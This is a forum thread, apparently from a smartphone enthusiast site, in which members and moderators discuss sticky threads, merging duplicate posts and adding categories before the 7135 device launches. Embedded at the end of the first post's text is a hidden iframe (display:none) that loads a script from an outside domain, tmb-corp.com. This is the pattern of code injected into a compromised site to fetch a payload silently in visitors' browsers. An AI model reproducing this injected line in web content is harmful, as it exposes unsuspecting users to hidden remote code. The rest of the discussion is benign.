+ Reply to Thread

A new thread...... about new threads

I was just wondering... in light of the many "release date" threads that we were having to track simultaneously (along with all of the other "same basic topic" threads)... should we come up with what will likely be the "popular" topics with the 7135 and create a one-stop-shopping sticky thread for all discussion on that topic? i.e. MP3 ringtones, games, SD card deals, cases, carrier plans, accessories, etc.? (those are just some examples)

It might cause more problems than it solves since some threads would get very long.... but maybe that's still better than having 20 threads on basically the same topic, which would make searching hard.

This idea is similar to HoTSynC's idea of a restructured "FAQ" forum in that it simplifies the process of finding the specific info you need.

I'm just curious to know what you guys/gals think (and if you think it's worth considering please offer your own topic suggestions!). Me, I'm just thinking about how much of a zoo it is going to be around here when traffic/posts probably increases by 500%-1000% and we're all scrambling to try to keep up.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Please visit my picture site: Robert-O-Rama :)

I second the motion. Every smiley in favor raise their hands:b_blue

Mod-Blog's SmartPhone Correspondent
    Count me in the "Nay" column. I like the idea of restructured FAQ which would work in this way, but simply "stickfying" every popular thread raises its own issues and changes the nature of the discussion. Sometimes it is nice to have the same question asked again - it forces us to look at it in a new way.

So my recommendation would be to create a locked FAQ and then have mods cherry-pick worth submissions from discussions to add to the FAQs.

Just my two cents.

I agree with Nomad... An in depth FAQ would be a great idea...

-Mike

Well, I do agree that sticky's should be used in moderation.... but I can just see dozens of threads every time somebody finds a good SD card deal, or a cool new leather case, etc.
    Please visit my picture site: Robert-O-Rama :)

Fut

hmmm...

this might be a virtual impossibility, but I understand completely about conglomerating issues. I tried to do a few searches and came up with a dozen or so off-topic issues that simply had the word in the thread listed on like the fifteenth page.
    This might clutter things up even more, but what about a sub-menu within the 7135 menu categorized into the aforementioned individual categories? I would definitely have to agree with nomad, that " '...stickfying' every popular thread... changes the nature of the discussion..."

Nathan

Can't I merge this somewhere ???? LOL j/k

Administrator
    merge is what we will do for similiar postings. sticking all those threads wont really make anything better, only clutter up the page.

when folks started to find cases for the 6035 they would post one in a new thread everytime and that didnt make sense. i know everyone likes to have their post seen instead of in another thread but that is really not the thing to do.

just my opinion...

That's a good point.... if we are more proactive with merging threads then we will have, in effect, what I had in mind, but without needing to make anything sticky. The goal I had in mind was to prevent multiple threads on the exact same topic, which merging will take care of. And now that we have enough man (and woman!) power with mod's it shouldn't be any problem keeping things under control.

I really do think that the activity here will surpass all of our expectations when the 7135 comes out!

Creating categories is the idea i agree with. What is this Sticky you all are talking about. It doesn't appear any different to me when i log on. Should it?

Oh When that Shark Bites! LBOCEAN's Avatar
    Merging threads can be a tricky thing (not functionaly) but, for both to follow in line with what each post is working through.

On another note, some time back I suggested setting up categories for both the 6035 & 7135 forums. JJ/Jazz both agreed it would be helpful, but at the time, was alittle more work than what we all had time for.

As i've been cleaning up posts (primarily on the 6035 side), i've been making notes for a good category options that would work well for both forums.

Once the cleanup is complete, I beleive we may begin working on setting things up via category.

The big thing is... The best way to implement it.

Setting up new Threads and peforming moves is alot of work, as apposed to an idea I had, that JJ is looking into were each new thread will have a pull-down menu that will allow the originator to select what category his/her's topic belongs in.

If this get's implemented, then going back through the threads and simply assigning the proper categories would be a breeze.

As for a timing on this project, nothings been set.

Just researching what's available for options at the moment.